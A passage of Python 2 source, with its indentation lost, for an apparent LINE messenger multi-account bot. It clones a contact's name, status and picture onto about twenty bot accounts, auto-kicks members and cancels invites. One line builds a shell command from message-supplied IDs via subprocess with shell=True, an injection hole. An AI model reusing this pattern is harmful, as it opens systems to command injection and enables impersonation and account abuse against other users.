backup = k9.getProfile()
profile = k9.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = k10.getProfile()
backup = k10.getProfile()
profile = k10.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = k11.getProfile()
backup = k11.getProfile()
profile = k11.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = k12.getProfile()
backup = k12.getProfile()
profile = k12.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = k13.getProfile()
backup = k13.getProfile()
profile = k13.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = k14.getProfile()
backup = k14.getProfile()
profile = k14.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = k15.getProfile()
backup = k15.getProfile()
profile = k15.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = k16.getProfile()
backup = k16.getProfile()
profile = k16.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = k17.getProfile()
backup = k17.getProfile()
profile = k17.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = k18.getProfile()
backup = k18.getProfile()
profile = k18.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = k19.getProfile()
backup = k19.getProfile()
profile = k19.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = k20.getProfile()
backup = k20.getProfile()
profile = k20.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
def upload_tempimage(client):
'''
Upload a picture of a kitten. We don't ship one, so get creative!
'''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def yt(query):
with requests.session() as s:
isi = []
if query == "":
query = "S1B tanysyz"
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
for a in soup.select('.yt-lockup-title > a[title]'):
if '&list=' not in a['href']:
if 'watch?v' in a['href']:
b = a['href'].replace('watch?v=', '')
isi += ['youtu.be' + b]
return isi
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def mention(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "[Command] Tag All"
try:
cl.sendMessage(msg)
except Exception as error:
print error
def mention2(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "[Command] Tag All"
try:
cl.sendMessage(msg)
except Exception as error:
print error
def MENTION(to,nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nama:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "[COMMAND] Tag All"
try:
cl.sendMessage(msg)
except Exception as error:
print error
def sendMessage(self, messageObject):
return self.Talk.client.sendMessage(0,messageObject)
def sendText(self, Tomid, text):
msg = Message()
msg.to = Tomid
msg.text = text
return self.Talk.client.sendMessage(0, msg)
def sendImage(self, to_, path):
M = Message(to=to_,contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M_id = self._client.sendMessage(M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self._client.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
#r.content
return True
def sendAudio(self, to_, path):
M = Message(to=to_, text=None, contentType = 3)
M.contentMetadata = None
M.contentPreview = None
M2 = self.Talk.client.sendMessage(0,M)
M_id = M2.id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'audio',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self.post_content('https://obs-sg.line-apps.com/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload audio failure.')
return True
def sendImageWithURL(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'w') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download image failure.')
try:
self.sendImage(to_, path)
except Exception as e:
raise e
def sendAudioWithURL(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'wb') as f:
r.raw.decode_content = True
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download Audio failure.')
try:
self.sendAudio(to_, path)
except Exception as e:
print e
def post_content(self, urls, data=None, files=None):
return self._session.post(urls, headers=self._headers, data=data, files=files)
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def NOTIFIED_READ_MESSAGE(op):
print op
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n·" + Name + datetime.now().strftime(' [%d - %H:%M:%S]')
wait2['ROM'][op.param1][op.param2] = "·" + Name + " ?"
else:
pass
except:
pass
def RECEIVE_MESSAGE(op):
msg = op.message
try:
if msg.contentType == 0:
try:
if msg.to in wait2['readPoint']:
if msg.from_ in wait2["ROM"][msg.to]:
del wait2["ROM"][msg.to][msg.from_]
else:
pass
except:
pass
else:
pass
except KeyboardInterrupt:
sys.exit(0)
except Exception as error:
print error
print ("\n\nRECEIVE_MESSAGE\n\n")
return
def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX...
tex = ["+","@","/",">",";","^","%","$","^","???:","???:","???:","???:"]
for tex in tex:
for command in commands:
if string ==command:
return True
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
if op.type == 55:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += '\n ? ' + Name
wait2['ROM'][op.param1][op.param2] = '? ' + Name
else:
pass
#-------------------------------------------
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n· " + Name + datetime.today().strftime(' [%d - %H:%M:%S]')
wait2['ROM'][op.param1][op.param2] = "· " + Name
wait2['setTime'][msg.to] = datetime.today().strftime('%Y-%m-%d %H:%M:%S')
else:
pass
except:
pass
#------------------------------------------
if op.type == 11:
if op.param3 == '1':
if op.param1 in wait['pname']:
try:
G = cl.getGroup(op.param1)
except:
try:
G = ki.getGroup(op.param1)
except:
try:
G = kk.getGroup(op.param1)
except:
try:
G = kc.getGroup(op.param1)
except:
try:
G = ks.getGroup(op.param1)
except:
try:
G = k1.getGroup(op.param1)
except:
pass
G.name = wait['pro_name'][op.param1]
try:
cl.updateGroup(G)
except:
try:
ki.updateGroup(G)
except:
try:
kk.updateGroup(G)
except:
try:
kc.updateGroup(G)
except:
try:
ks.updateGroup(G)
except:
try:
k1.updateGroup(G)
except:
pass
if op.param2 in ken:
pass
else:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ks.kickoutFromGroup(op.param1,[op.param2])
except:
try:
k1.kickoutFromGroup(op.param1,[op.param2])
except:
pass
kk.sendText(op.param1,"please do not change group name-_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
#------Protect Group Kick start------#
if op.type == 11:
if wait["Protectgr"] == True:
if cl.getGroup(op.param1).preventJoinByTicket == False:
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
try:
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "Jangan Buka Kode QR Woyyyyy...!!!")
cl.kickoutFromGroup(op.param1,[op.param2])
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
except:
random.choice(KAC).sendText(op.param1,random.choice(KAC).getContact(op.param2).displayName + "Jangan Buka Kode QR Woyyyyy...!!!")
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
Z = random.choice(KAC).getGroup(op.param1)
Z.preventJoinByTicket = True
random.choice(KAC).updateGroup(Z)
#------Protect Group Kick finish-----#
#------Cancel Invite User start------#
if op.type == 13:
if wait["Protectcancl"] == True:
group = cl.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
try:
random.choice(KAC).cancelGroupInvitation(op.param1, gMembMids)
random.choice(KAC).sendText(op.param1, "Mau Ngundang Siapa Ka?\nKk Bukan Admin\nJadi Aku Cancel??")
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
random.choice(KAC).cancelGroupInvitation(op.param1, gMembMids)
random.choice(KAC).sendText(op.param1, "Mau Ngundang Siapa Ka?\nKk Bukan Admin\nJadi Aku Cancel??")
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
#------Cancel Invite User Finish------#
#--------------------END_OF_OPERATION--------------------
if op.type == 0:
return
#-------------------NOTIFIED_READ_MESSAGE----------------
if op.type == 55:
try:
group_id = op.param1
user_id=op.param2
subprocess.Popen('echo "'+ user_id+'|'+str(op.createdTime)+'" >> dataSeen/%s.txt' % group_id, shell=True, stdout=subprocess.PIPE, )
except Exception as e:
print e
#------------------NOTIFIED_INVITE_INTO_ROOM-------------
if op.type == 22:
cl.leaveRoom(op.param1)
#--------------------INVITE_INTO_ROOM--------------------
if op.type == 21:
cl.leaveRoom(op.param1)
#--------------NOTIFIED_INVITE_INTO_GROUP----------------
if op.type == 13:
print op.param3
if op.param3 in mid:
if op.param2 in Creator:
cl.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Creator:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Creator:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Creator:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Creator:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Creator:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Creator:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Creator:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Creator:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Creator:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Jmid:
if op.param2 in Creator:
k6.acceptGroupInvitation(op.param1)
if op.param3 in Kmid:
if op.param2 in Creator:
k7.acceptGroupInvitation(op.param1)
if op.param3 in Lmid:
if op.param2 in Creator:
k8.acceptGroupInvitation(op.param1)
if op.param3 in Mmid:
if op.param2 in Creator:
k9.acceptGroupInvitation(op.param1)
if op.param3 in Nmid:
if op.param2 in Creator:
k10.acceptGroupInvitation(op.param1)
if op.param3 in Omid:
if op.param2 in Creator:
k11.acceptGroupInvitation(op.param1)
if op.param3 in Pmid:
if op.param2 in Creator:
k12.acceptGroupInvitation(op.param1)
if op.param3 in Qmid:
if op.param2 in Creator:
k13.acceptGroupInvitation(op.param1)
if op.param3 in Rmid:
if op.param2 in Creator:
k14.acceptGroupInvitation(op.param1)
if op.param3 in Smid:
if op.param2 in Creator:
k15.acceptGroupInvitation(op.param1)
if op.param3 in Tmid:
if op.param2 in Creator:
k16.acceptGroupInvitation(op.param1)
if op.param3 in Umid:
if op.param2 in Creator:
k17.acceptGroupInvitation(op.param1)
if op.param3 in Vmid:
if op.param2 in Creator:
k18.acceptGroupInvitation(op.param1)
if op.param3 in Wmid:
if op.param2 in Creator:
k19.acceptGroupInvitation(op.param1)
if op.param3 in Xmid:
if op.param2 in Creator:
k20.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in mid:
if op.param2 in Amid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Bmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Cmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Dmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Emid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Fmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Gmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Hmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Imid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Jmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Kmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Lmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Mmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Nmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Omid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Pmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Qmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Rmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Smid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Tmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Umid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Vmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Wmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Xmid:
cl.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Amid:
if op.param2 in mid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Bmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Cmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Dmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Emid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Fmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Gmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Hmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Imid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Jmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Kmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Lmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Mmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Nmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Omid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Pmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Qmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Rmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Smid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Tmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Umid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Vmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Wmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Xmid:
ki.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Bmid:
if op.param2 in mid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Amid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Cmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Dmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Emid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Fmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Gmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Hmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Imid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Jmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Kmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Lmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Mmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Nmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Omid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Pmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Qmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Rmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Smid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Tmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Umid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Vmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Wmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Xmid:
kk.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Cmid:
if op.param2 in mid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Amid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Bmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Dmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Emid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Fmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Gmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Hmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Imid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Jmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Kmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Lmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Mmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Nmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Omid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Pmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Qmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Rmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Smid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Tmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Umid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Vmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Wmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Xmid:
kc.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Dmid:
if op.param2 in mid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Amid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Bmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Cmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Emid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Fmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Gmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Hmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Imid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Jmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Kmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Lmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Mmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Nmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Omid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Pmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Qmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Rmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Smid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Tmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Umid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Vmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Wmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Xmid:
ks.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Emid:
if op.param2 in mid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Amid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Bmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Cmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Dmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Fmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Gmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Hmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Imid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Jmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Kmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Lmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Mmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Nmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Omid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Pmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Qmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Rmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Smid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Tmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Umid:
